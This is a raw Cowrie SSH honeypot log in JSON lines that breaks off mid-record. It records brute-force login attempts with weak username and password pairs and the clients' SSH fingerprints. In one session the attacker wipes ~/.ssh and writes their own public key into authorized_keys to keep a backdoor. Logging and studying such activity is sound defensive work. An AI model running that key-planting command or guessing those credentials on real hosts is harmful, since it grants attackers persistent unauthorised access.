{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:41:15.978167Z","src_ip":"212.227.125.160","session":"b09e9b1ce5a4"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"password1","message":"login attempt [hadoop/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T03:41:17.587582Z","src_ip":"212.227.125.160","session":"b09e9b1ce5a4"}
{"eventid":"cowrie.session.connect","src_ip":"34.14.223.46","src_port":39518,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e92059e25dd","protocol":"ssh","message":"New connection: 34.14.223.46:39518 (1.2.3.4:22) [session: 3e92059e25dd]","sensor":"my-vps","timestamp":"2025-08-31T03:41:18.009940Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:41:18.018695Z","src_ip":"34.14.223.46","session":"3e92059e25dd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:41:18.276837Z","src_ip":"34.14.223.46","session":"3e92059e25dd"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:41:19.348231Z","src_ip":"212.227.125.160","session":"b09e9b1ce5a4"}
{"eventid":"cowrie.login.failed","username":"git","password":"git","message":"login attempt [git/git] failed","sensor":"my-vps","timestamp":"2025-08-31T03:41:21.016886Z","src_ip":"34.14.223.46","session":"3e92059e25dd"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:41:22.285023Z","src_ip":"34.14.223.46","session":"3e92059e25dd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40570,"dst_ip":"1.2.3.4","dst_port":22,"session":"55e2b1b919b9","protocol":"ssh","message":"New connection: 212.227.125.160:40570 (1.2.3.4:22) [session: 55e2b1b919b9]","sensor":"my-vps","timestamp":"2025-08-31T03:41:23.887272Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:41:23.888133Z","src_ip":"212.227.125.160","session":"55e2b1b919b9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:41:24.137319Z","src_ip":"212.227.125.160","session":"55e2b1b919b9"}
{"eventid":"cowrie.login.success","username":"root","password":"Asdf@123","message":"login attempt [root/Asdf@123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:41:25.184523Z","src_ip":"212.227.125.160","session":"55e2b1b919b9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:41:26.158758Z","src_ip":"212.227.125.160","session":"55e2b1b919b9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T03:41:26.159493Z","src_ip":"212.227.125.160","session":"55e2b1b919b9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T03:41:26.160694Z","src_ip":"212.227.125.160","session":"55e2b1b919b9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:41:26.409666Z","src_ip":"212.227.125.160","session":"55e2b1b919b9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:41:26.925438Z","src_ip":"212.227.125.160","session":"55e2b1b919b9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T03:41:26.926159Z","src_ip":"212.227.125.160","session":"55e2b1b919b9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T03:41:27.173271Z","src_ip":"212.227.125.160","session":"55e2b1b919b9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:41:27.174175Z","src_ip":"212.227.125.160","session":"55e2b1b919b9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41636,"dst_ip":"1.2.3.4","dst_port":22,"session":"a648b77543f8","protocol":"ssh","message":"New connection: 212.227.125.160:41636 (1.2.3.4:22) [session: a648b77543f8]","sensor":"my-vps","timestamp":"2025-08-31T03:41:27.426490Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:41:27.427292Z","src_ip":"212.227.125.160","session":"a648b77543f8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:41:27.676681Z","src_ip":"212.227.125.160","session":"a648b77543f8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T03:41:28.712798Z","src_ip":"212.227.125.160","session":"a648b77543f8"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:41:29.962236Z","src_ip":"212.227.125.160","session":"a648b77543f8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42546,"dst_ip":"1.2.3.4","dst_port":22,"session":"1df111f8d189","protocol":"ssh","message":"New connection: 212.227.125.160:42546 (1.2.3.4:22) [session: 1df111f8d189]","sensor":"my-vps","timestamp":"2025-08-31T03:41:30.216930Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:41:30.217974Z","src_ip":"212.227.125.160","session":"1df111f8d189"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:41:30.464347Z","src_ip":"212.227.125.160","session":"1df111f8d189"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:41:31.502260Z","src_ip":"212.227.125.160","session":"1df111f8d189"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:41:31.756048Z","src_ip":"212.227.125.160","session":"55e2b1b919b9"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:41:31.757461Z","src_ip":"212.227.125.160","session":"1df111f8d189"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38692,"dst_ip":"1.2.3.4","dst_port":22,"session":"74acaa90bfd8","protocol":"ssh","message":"New connection: 212.227.125.160:38692 (1.2.3.4:22) [session: 74acaa90bfd8]","sensor":"my-vps","timestamp":"2025-08-31T03:41:37.651085Z"}
{"eventid":"cowrie.login.failed","username":"guest","password":"abc123","message":"login attempt [guest/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:41:39.061588Z","src_ip":"212.227.235.229","session":"2b3407cb9b05"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:41:46.878812Z","src_ip":"212.227.125.160","session":"74acaa90bfd8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:41:46.879828Z","src_ip":"212.227.125.160","session":"74acaa90bfd8"}
{"eventid":"cowrie.session.closed","duration":"41.9","message":"Connection lost after 41.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:41:47.424412Z","src_ip":"212.227.235.229","session":"2b3407cb9b05"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42322,"dst_ip":"1.2.3.4","dst_port":22,"session":"346af111ecc5","protocol":"ssh","message":"New connection: 212.227.235.229:42322 (1.2.3.4:22) [session: 346af111ecc5]","sensor":"my-vps","timestamp":"2025-08-31T03:41:53.338534Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:41:54.099041Z","src_ip":"212.227.235.229","session":"346af111ecc5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:41:54.099727Z","src_ip":"212.227.235.229","session":"346af111ecc5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52210,"dst_ip":"1.2.3.4","dst_port":22,"session":"15cbaeaf80b9","protocol":"ssh","message":"New connection: 212.227.235.229:52210 (1.2.3.4:22) [session: 15cbaeaf80b9]","sensor":"my-vps","timestamp":"2025-08-31T03:41:59.102248Z"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"admin123","message":"login attempt [hadoop/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:42:00.017545Z","src_ip":"212.227.235.229","session":"346af111ecc5"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:42:01.918158Z","src_ip":"212.227.235.229","session":"346af111ecc5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40214,"dst_ip":"1.2.3.4","dst_port":22,"session":"e68a1236e586","protocol":"ssh","message":"New connection: 212.227.125.160:40214 (1.2.3.4:22) [session: e68a1236e586]","sensor":"my-vps","timestamp":"2025-08-31T03:42:07.709266Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:42:07.710789Z","src_ip":"212.227.125.160","session":"e68a1236e586"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-31T03:42:08.530198Z","src_ip":"212.227.125.160","session":"e68a1236e586"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46644,"dst_ip":"1.2.3.4","dst_port":22,"session":"02d82464bf43","protocol":"ssh","message":"New connection: 212.227.235.229:46644 (1.2.3.4:22) [session: 02d82464bf43]","sensor":"my-vps","timestamp":"2025-08-31T03:42:10.597327Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:42:10.598469Z","src_ip":"212.227.235.229","session":"02d82464bf43"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com",